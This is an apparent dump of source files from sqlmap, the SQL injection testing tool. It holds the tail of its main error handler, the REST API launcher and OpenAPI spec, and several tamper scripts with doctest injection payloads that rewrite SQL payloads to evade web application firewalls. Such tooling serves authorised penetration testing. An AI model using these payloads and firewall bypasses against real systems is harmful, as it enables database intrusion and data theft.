running Metasploit\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"Permission denied\", \"metasploit\")):\n            errMsg = \"permission error occurred while using Metasploit\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"Read-only file system\" in excMsg:\n            errMsg = \"output device is mounted as read-only\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"Insufficient system resources\" in excMsg:\n            errMsg = \"resource exhaustion detected\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"OperationalError: disk I/O error\" in excMsg:\n            errMsg = \"I/O error on output device\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"Violation of BIDI\" in excMsg:\n            errMsg = \"invalid URL (violation of Bidi IDNA rule - RFC 5893)\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"Invalid IPv6 URL\" in excMsg:\n            errMsg = \"invalid URL ('%s')\" % excMsg.strip().split('\\n')[-1]\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"_mkstemp_inner\" in excMsg:\n            errMsg = \"there has been a problem while accessing temporary files\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif any(_ in excMsg for _ in (\"tempfile.mkdtemp\", \"tempfile.mkstemp\", \"tempfile.py\")):\n            errMsg = \"unable to write to the temporary directory '%s'. \" % tempfile.gettempdir()\n            errMsg += \"Please make sure that your disk is not full and \"\n            errMsg += \"that you have sufficient write permissions to \"\n            errMsg += \"create temporary files and/or directories\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"Permission denied: '\" in excMsg:\n            match = re.search(r\"Permission denied: '([^']*)\", excMsg)\n            errMsg = \"permission error occurred while accessing file '%s'\" % match.group(1)\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"twophase\", \"sqlalchemy\")):\n            errMsg = \"please update the 'sqlalchemy' package (>= 1.1.11) \"\n            errMsg += \"(Reference: 'https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe')\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"invalid maximum character passed to PyUnicode_New\" in excMsg and re.search(r\"\\A3\\.[34]\", sys.version) is not None:\n            errMsg = \"please upgrade the Python version (>= 3.5) \"\n            errMsg += \"(Reference: 'https://bugs.python.org/issue18183')\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"scramble_caching_sha2\", \"TypeError\")):\n            errMsg = \"please downgrade the 'PyMySQL' package (=< 0.8.1) \"\n            errMsg += \"(Reference: 'https://github.com/PyMySQL/PyMySQL/issues/700')\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"must be pinned buffer, not bytearray\" in excMsg:\n            errMsg = \"error occurred at Python interpreter which \"\n            errMsg += \"is fixed in 2.7. Please update accordingly \"\n            errMsg += \"(Reference: 'https://bugs.python.org/issue8104')\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"OSError: [Errno 22] Invalid argument: '\", \"importlib\")):\n            errMsg = \"unable to read file '%s'\" % extractRegexResult(r\"OSError: \\[Errno 22\\] Invalid argument: '(?P<result>[^']+)\", excMsg)\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"hash_randomization\" in excMsg:\n            errMsg = \"error occurred at Python interpreter which \"\n            errMsg += \"is fixed in 2.7.3. Please update accordingly \"\n            errMsg += \"(Reference: 'https://docs.python.org/2/library/sys.html')\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"AttributeError: unable to access item\" in excMsg and re.search(r\"3\\.11\\.\\d+a\", sys.version):\n            errMsg = \"there is a known issue when sqlmap is run with ALPHA versions of Python 3.11. \"\n            errMsg += \"Please downgrade to some stable Python version\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"Resource temporarily unavailable\", \"os.fork()\", \"dictionaryAttack\")):\n            errMsg = \"there has been a problem while running the multiprocessing hash cracking. \"\n            errMsg += \"Please rerun with option '--threads=1'\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"can't start new thread\" in excMsg:\n            errMsg = \"there has been a problem while creating new thread instance. \"\n            errMsg += \"Please make sure that you are not running too many processes\"\n            if not IS_WIN:\n                errMsg += \" (or increase the 'ulimit -u' value)\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"can't allocate read lock\" in excMsg:\n            errMsg = \"there has been a problem in regular socket operation \"\n            errMsg += \"('%s')\" % excMsg.strip().split('\\n')[-1]\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"pymysql\", \"configparser\")):\n            errMsg = \"wrong initialization of 'pymsql' detected (using Python3 dependencies)\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"ntlm\", \"socket.error, err\", \"SyntaxError\")):\n            errMsg = \"wrong initialization of 'python-ntlm' detected (using Python2 syntax)\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"drda\", \"to_bytes\")):\n            errMsg = \"wrong initialization of 'drda' detected (using Python3 syntax)\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"'WebSocket' object has no attribute 'status'\" in excMsg:\n            errMsg = \"wrong websocket library detected\"\n            errMsg += \" (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"window = tkinter.Tk()\",)):\n            errMsg = \"there has been a problem in initialization of GUI interface \"\n            errMsg += \"('%s')\" % excMsg.strip().split('\\n')[-1]\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif any(_ in excMsg for _ in (\"unable to access item 'liveTest'\",)):\n            errMsg = \"detected usage of files from different versions of sqlmap\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif kb.get(\"dumpKeyboardInterrupt\"):\n            raise SystemExit\n\n        elif any(_ in excMsg for _ in (\"Broken pipe\",)):\n            raise SystemExit\n\n        elif valid is False:\n            errMsg = \"code integrity check failed (turning off automatic issue creation). \"\n            errMsg += \"You should retrieve the latest development version from official GitHub \"\n            errMsg += \"repository at '%s'\" % GIT_PAGE\n            logger.critical(errMsg)\n            print()\n            dataToStdout(excMsg)\n            raise SystemExit\n\n        elif any(_ in \"%s\\n%s\" % (errMsg, excMsg) for _ in (\"tamper/\", \"waf/\", \"--engagement-dojo\")):\n            logger.critical(errMsg)\n            print()\n            dataToStdout(excMsg)\n            raise SystemExit\n\n        elif any(_ in excMsg for _ in (\"ImportError\", \"ModuleNotFoundError\", \"<frozen\", \"Can't find file for module\", \"SAXReaderNotAvailable\", \"source code string cannot contain null bytes\", \"No module named\", \"tp_name field\", \"module 'sqlite3' has no attribute 'OperationalError'\")):\n            errMsg = \"invalid runtime environment ('%s')\" % excMsg.split(\"Error: \")[-1].strip()\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"SyntaxError: Non-ASCII character\", \".py on line\", \"but no encoding declared\")):\n            errMsg = \"invalid runtime environment ('%s')\" % excMsg.split(\"Error: \")[-1].strip()\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"PermissionError: [WinError 5]\", \"multiprocessing\")):\n            errMsg = \"there is a permission problem in running multiprocessing on this system. \"\n            errMsg += \"Please rerun with '--disable-multi'\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"No such file\", \"_'\")):\n            errMsg = \"corrupted installation detected ('%s'). \" % excMsg.strip().split('\\n')[-1]\n            errMsg += \"You should retrieve the latest development version from official GitHub \"\n            errMsg += \"repository at '%s'\" % GIT_PAGE\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"No such file\", \"sqlmap.conf\", \"Test\")):\n            errMsg = \"you are trying to run (hidden) development tests inside the production environment\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"HTTPNtlmAuthHandler\", \"'str' object has no attribute 'decode'\")):\n            errMsg = \"package 'python-ntlm' has a known compatibility issue with the \"\n            errMsg += \"Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61')\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"'DictObject' object has no attribute '\" in excMsg and all(_ in errMsg for _ in (\"(fingerprinted)\", \"(identified)\")):\n            errMsg = \"there has been a problem in enumeration. \"\n            errMsg += \"Because of a considerable chance of false-positive case \"\n            errMsg += \"you are advised to rerun with switch '--flush-session'\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"AttributeError: 'module' object has no attribute 'F_GETFD'\" in excMsg:\n            errMsg = \"invalid runtime (\\\"%s\\\") \" % excMsg.split(\"Error: \")[-1].strip()\n            errMsg += \"(Reference: 'https://stackoverflow.com/a/38841364' & 'https://bugs.python.org/issue24944#msg249231')\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif \"bad marshal data (unknown type code)\" in excMsg:\n            match = re.search(r\"\\s*(.+)\\s+ValueError\", excMsg)\n            errMsg = \"one of your .pyc files are corrupted%s\" % (\" ('%s')\" % match.group(1) if match else \"\")\n            errMsg += \". Please delete .pyc files on your system to fix the problem\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        for match in re.finditer(r'File \"(.+?)\", line', excMsg):\n            file_ = match.group(1)\n            try:\n                file_ = os.path.relpath(file_, os.path.dirname(__file__))\n            except ValueError:\n                pass\n            file_ = file_.replace(\"\\\\\", '/')\n            if \"../\" in file_:\n                file_ = re.sub(r\"(\\.\\./)+\", '/', file_)\n            else:\n                file_ = file_.lstrip('/')\n            file_ = re.sub(r\"/{2,}\", '/', file_)\n            excMsg = excMsg.replace(match.group(1), file_)\n\n        errMsg = maskSensitiveData(errMsg)\n        excMsg = maskSensitiveData(excMsg)\n\n        if conf.get(\"api\") or not valid:\n            logger.critical(\"%s\\n%s\" % (errMsg, excMsg))\n        else:\n            logger.critical(errMsg)\n            dataToStdout(\"%s\\n\" % setColor(excMsg.strip(), level=logging.CRITICAL))\n            createGithubIssue(errMsg, excMsg)\n\n    finally:\n        kb.threadContinue = False\n\n        if getDaysFromLastUpdate() > LAST_UPDATE_NAGGING_DAYS:\n            warnMsg = \"your sqlmap version is outdated\"\n            logger.warning(warnMsg)\n\n        if conf.get(\"showTime\"):\n            dataToStdout(\"\\n[*] ending @ %s\\n\\n\" % time.strftime(\"%X /%Y-%m-%d/\"), forceOutput=True)\n\n        kb.threadException = True\n\n        if kb.get(\"tempDir\"):\n            for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY):\n                for filepath in glob.glob(os.path.join(kb.tempDir, \"%s*\" % prefix)):\n                    try:\n                        os.remove(filepath)\n                    except OSError:\n                        pass\n\n            if not filterNone(filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in (\".lock\", \".exe\", \".so\", '_'))):  # ignore junk files\n                try:\n                    shutil.rmtree(kb.tempDir, ignore_errors=True)\n                except OSError:\n                    pass\n\n        if conf.get(\"hashDB\"):\n            conf.hashDB.flush(True)\n            conf.hashDB.close()         # NOTE: because of PyPy\n\n        if conf.get(\"harFile\"):\n            try:\n                with openFile(conf.harFile, \"w+b\") as f:\n                    json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': '))\n            except SqlmapBaseException as ex:\n                errMsg = getSafeExString(ex)\n                logger.critical(errMsg)\n\n        if conf.get(\"api\"):\n            conf.databaseCursor.disconnect()\n\n        if conf.get(\"dumper\"):\n            conf.dumper.flush()\n\n        # short delay for thread finalization\n        _ = time.time()\n        while threading.active_count() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT:\n            time.sleep(0.01)\n\n        if cmdLineOptions.get(\"sqlmapShell\"):\n            cmdLineOptions.clear()\n            conf.clear()\n            kb.clear()\n            conf.disableBanner = True\n            main()\n\nif __name__ == \"__main__\":\n    try:\n        main()\n    except KeyboardInterrupt:\n        pass\n    except SystemExit:\n        raise\n    except:\n        traceback.print_exc()\n    finally:\n        # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program\n        if threading.active_count() > 1:\n            os._exit(getattr(os, \"_exitcode\", 0))\n        else:\n            sys.exit(getattr(os, \"_exitcode\", 0))\nelse:\n    # cancelling postponed imports (because of CI/CD checks)\n    __import__(\"lib.controller.controller\")\n"
  },
  {
    "path": "sqlmap/sqlmapapi.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport sys\n\nsys.dont_write_bytecode = True\n\n__import__(\"lib.utils.versioncheck\")  # this has to be the first non-standard import\n\nimport logging\nimport optparse\nimport os\nimport warnings\n\nwarnings.filterwarnings(action=\"ignore\", category=UserWarning)\nwarnings.filterwarnings(action=\"ignore\", category=DeprecationWarning)\n\nfrom lib.core.common import getUnicode\nfrom lib.core.common import setPaths\nfrom lib.core.data import logger\nfrom lib.core.patch import dirtyPatches\nfrom lib.core.patch import resolveCrossReferences\nfrom lib.core.settings import RESTAPI_DEFAULT_ADAPTER\nfrom lib.core.settings import RESTAPI_DEFAULT_ADDRESS\nfrom lib.core.settings import RESTAPI_DEFAULT_PORT\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.utils.api import client\nfrom lib.utils.api import server\n\ntry:\n    from sqlmap import modulePath\nexcept ImportError:\n    def modulePath():\n        return getUnicode(os.path.dirname(os.path.realpath(__file__)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)\n\ndef main():\n    \"\"\"\n    REST-JSON API main function\n    \"\"\"\n\n    dirtyPatches()\n    resolveCrossReferences()\n\n    # Set default logging level to debug\n    logger.setLevel(logging.DEBUG)\n\n    # Initialize paths\n    setPaths(modulePath())\n\n    # Parse command line options\n    apiparser = optparse.OptionParser()\n    apiparser.add_option(\"-s\", \"--server\", help=\"Run as a REST-JSON API server\", action=\"store_true\")\n    apiparser.add_option(\"-c\", \"--client\", help=\"Run as a REST-JSON API client\", action=\"store_true\")\n    apiparser.add_option(\"-H\", \"--host\", help=\"Host of the REST-JSON API server (default \\\"%s\\\")\" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action=\"store\")\n    apiparser.add_option(\"-p\", \"--port\", help=\"Port of the the REST-JSON API server (default %d)\" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type=\"int\", action=\"store\")\n    apiparser.add_option(\"--adapter\", help=\"Server (bottle) adapter to use (default \\\"%s\\\")\" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action=\"store\")\n    apiparser.add_option(\"--username\", help=\"Basic authentication username (optional)\", action=\"store\")\n    apiparser.add_option(\"--password\", help=\"Basic authentication password (optional)\", action=\"store\")\n    (args, _) = apiparser.parse_args()\n\n    # Start the client or the server\n    if args.server:\n        server(args.host, args.port, adapter=args.adapter, username=args.username, password=args.password)\n    elif args.client:\n        client(args.host, args.port, username=args.username, password=args.password)\n    else:\n        apiparser.print_help()\n\nif __name__ == \"__main__\":\n    main()\n"
  },
  {
    "path": "sqlmap/sqlmapapi.yaml",
    "content": "openapi: 3.0.1\ninfo:\n  title: sqlmapapi OpenAPI/Swagger specification\n  version: '0.1'\npaths:\n  /version:\n    get:\n      description: Fetch server version\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                type: object\n                properties:\n                  version:\n                    type: string\n                    example: \"1.5.7.7#dev\"\n                  success:\n                    type: boolean\n                    example: true\n  /task/new:\n    get:\n      description: Create a new task\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                type: object\n                properties:\n                  taskid:\n                    type: string\n                    example: \"fad44d6beef72285\"\n                  success:\n                    type: boolean\n                    example: true\n  /scan/{taskid}/start:\n    post:\n      description: Launch a scan\n      parameters:\n        - in: path\n          name: taskid\n          required: true\n          schema:\n            type: string\n          description: Scan task ID\n      requestBody:\n        content:\n          application/json:\n            schema:\n              type: object\n              properties:\n                url:\n                  type: string\n            examples:\n              '0':\n                value: '{\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1\"}'\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                type: object\n                properties:\n                  engineid:\n                    type: integer\n                    example: 19720\n                  success:\n                    type: boolean\n                    example: true\n  /scan/{taskid}/stop:\n    get:\n      description: Stop a scan\n      parameters:\n        - in: path\n          name: taskid\n          required: true\n          schema:\n            type: string\n          description: Scan task ID\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                type: object\n                properties:\n                  success:\n                    type: boolean\n                    example: true\n  /scan/{taskid}/status:\n    get:\n      description: Fetch status of a scan\n      parameters:\n        - in: path\n          name: taskid\n          required: true\n          schema:\n            type: string\n          description: Scan task ID\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                type: object\n                properties:\n                  status:\n                    type: string\n                    example: terminated\n                  returncode:\n                    type: integer\n                    example: 0\n                  success:\n                    type: boolean\n                    example: true\n  /scan/{taskid}/list:\n    get:\n      description: List options for a given task ID\n      parameters:\n        - in: path\n          name: taskid\n          required: true\n          schema:\n            type: string\n          description: Scan task ID\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                type: object\n                properties:\n                  success:\n                    type: boolean\n                    example: true\n                  options:\n                    type: array\n                    items:\n                      type: object\n  /scan/{taskid}/data:\n    get:\n      description: Retrieve the scan resulting data\n      parameters:\n        - in: path\n          name: taskid\n          required: true\n          schema:\n            type: string\n          description: Scan task ID\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                type: object\n                properties:\n                  data:\n                    type: array\n                    items:\n                      type: object\n                  success:\n                    type: boolean\n                    example: true\n                  error:\n                    type: array\n                    items:\n                      type: object\n  /scan/{taskid}/log:\n    get:\n      description: Retrieve the log messages\n      parameters:\n        - in: path\n          name: taskid\n          required: true\n          schema:\n            type: string\n          description: Scan task ID\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                type: object\n                properties:\n                  log:\n                    type: array\n                    items:\n                      type: object\n                  success:\n                    type: boolean\n                    example: true\n  /scan/{taskid}/kill:\n    get:\n      description: Kill a scan\n      parameters:\n        - in: path\n          name: taskid\n          required: true\n          schema:\n            type: string\n          description: Scan task ID\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                type: object\n                properties:\n                  success:\n                    type: boolean\n                    example: true\n  /task/{taskid}/delete:\n    get:\n      description: Delete an existing task\n      parameters:\n        - in: path\n          name: taskid\n          required: true\n          schema:\n            type: string\n          description: Scan task ID\n      responses:\n        '200':\n          description: OK\n          content:\n            application/json:\n              schema:\n                type: object\n                properties:\n                  success:\n                    type: boolean\n                    example: true\n"
  },
  {
    "path": "sqlmap/tamper/0eunion.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces instances of <int> UNION with <int>e0UNION\n\n    Requirement:\n        * MySQL\n        * MsSQL\n\n    Notes:\n        * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf\n\n    >>> tamper('1 UNION ALL SELECT')\n    '1e0UNION ALL SELECT'\n    \"\"\"\n\n    return re.sub(r\"(?i)(\\d+)\\s+(UNION )\", r\"\\g<1>e0\\g<2>\", payload) if payload else payload\n"
  },
  {
    "path": "sqlmap/tamper/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/tamper/apostrophemask.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOWEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)\n\n    References:\n        * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128\n        * https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/\n        * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850\n        * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps\n\n    >>> tamper(\"1 AND '1'='1\")\n    '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'\n    \"\"\"\n\n    return payload.replace('\\'', \"%EF%BC%87\") if payload else payload\n"
  },
  {
    "path": "sqlmap/tamper/apostrophenullencode.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOWEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)\n\n    >>> tamper(\"1 AND '1'='1\")\n    '1 AND %00%271%00%27=%00%271'\n    \"\"\"\n\n    return payload.replace('\\'', \"%00%27\") if payload else payload\n"
  },
  {
    "path": "sqlmap/tamper/appendnullbyte.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOWEST\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.ACCESS))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Appends (Access) NULL byte character (%00) at the end of payload\n\n    Requirement:\n        * Microsoft Access\n\n    Notes:\n        * Useful to bypass weak web application firewalls when the back-end\n          database management system is Microsoft Access - further uses are\n          also possible\n\n    Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection\n\n    >>> tamper('1 AND 1=1')\n    '1 AND 1=1%00'\n    \"\"\"\n\n    return \"%s%%00\" % payload if payload else payload\n"
  },
  {
    "path": "sqlmap/tamper/base64encode.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import encodeBase64\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Base64-encodes all characters in a given payload\n\n    >>> tamper(\"1' AND SLEEP(5)#\")\n    'MScgQU5EIFNMRUVQKDUpIw=='\n    \"\"\"\n\n    return encodeBase64(payload, binary=False) if payload else payload\n"
  },
  {
    "path": "sqlmap/tamper/between.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'\n\n    Tested against:\n        * Microsoft SQL Server 2005\n        * MySQL 4, 5.0 and 5.5\n        * Oracle 10g\n        * PostgreSQL 8.3, 8.4, 9.0\n\n    Notes:\n        * Useful to bypass weak and bespoke web application firewalls that\n          filter the greater than character\n        * The BETWEEN clause is SQL standard. Hence, this tamper script\n          should work against all (?) databases\n\n    >>> tamper('1 AND A > B--')\n    '1 AND A NOT BETWEEN 0 AND B--'\n    >>> tamper('1 AND A = B--')\n    '1 AND A BETWEEN B AND B--'\n    >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')\n    '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        match = re.search(r\"(?i)(\\b(AND|OR)\\b\\s+)(?!.*\\b(AND|OR)\\b)([^>]+?)\\s*>\\s*([^>]+)\\s*\\Z\", payload)\n\n        if match:\n            _ = \"%s %s NOT BETWEEN 0 AND %s\" % (match.group(2), match.group(4), match.group(5))\n            retVal = retVal.replace(match.group(0), _)\n        else:\n            retVal = re.sub(r\"\\s*>\\s*(\\d+|'[^']+'|\\w+\\(\\d+\\))\", r\" NOT BETWEEN 0 AND \\g<1>\", payload)\n\n        if retVal == payload:\n            match = re.search(r\"(?i)(\\b(AND|OR)\\b\\s+)(?!.*\\b(AND|OR)\\b)([^=]+?)\\s*=\\s*([\\w()]+)\\s*\", payload)\n\n            if match:\n                _ = \"%s %s BETWEEN %s AND %s\" % (match.group(2), match.group(4), match.group(5), match.group(5))\n                retVal = retVal.replace(match.group(0), _)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/binary.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Injects keyword binary where possible\n\n    Requirement:\n        * MySQL\n\n    >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')\n    '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'\n    >>> tamper('1 AND 2>1')\n    '1 AND binary 2>binary 1'\n    >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')\n    'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"\\bNULL\\b\", \"binary NULL\", retVal)\n        retVal = re.sub(r\"\\b(THEN\\s+)(\\d+|0x[0-9a-f]+)(\\s+ELSE\\s+)(\\d+|0x[0-9a-f]+)\", r\"\\g<1>binary \\g<2>\\g<3>binary \\g<4>\", retVal)\n        retVal = re.sub(r\"(\\d+\\s*[>=]\\s*)(\\d+)\", r\"binary \\g<1>binary \\g<2>\", retVal)\n        retVal = re.sub(r\"\\b((AND|OR)\\s*)(\\d+)\", r\"\\g<1>binary \\g<3>\", retVal)\n        retVal = re.sub(r\"([>=]\\s*)(\\d+)\", r\"\\g<1>binary \\g<2>\", retVal)\n        retVal = re.sub(r\"\\b(0x[0-9a-f]+)\", r\"binary \\g<1>\", retVal)\n        retVal = re.sub(r\"(\\s+binary)+\", r\"\\g<1>\", retVal)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/bluecoat.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.data import kb\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE\n\n    Requirement:\n        * Blue Coat SGOS with WAF activated as documented in\n        https://kb.bluecoat.com/index?page=content&id=FAQ2147\n\n    Tested against:\n        * MySQL 5.1, SGOS\n\n    Notes:\n        * Useful to bypass Blue Coat's recommended WAF rule configuration\n\n    >>> tamper('SELECT id FROM users WHERE id = 1')\n    'SELECT%09id FROM%09users WHERE%09id LIKE 1'\n    \"\"\"\n\n    def process(match):\n        word = match.group('word')\n        if word.upper() in kb.keywords:\n            return match.group().replace(word, \"%s%%09\" % word)\n        else:\n            return match.group()\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"\\b(?P<word>[A-Z_]+)(?=[^\\w(]|\\Z)\", process, retVal)\n        retVal = re.sub(r\"\\s*=\\s*\", \" LIKE \", retVal)\n        retVal = retVal.replace(\"%09 \", \"%09\")\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/chardoubleencode.py",
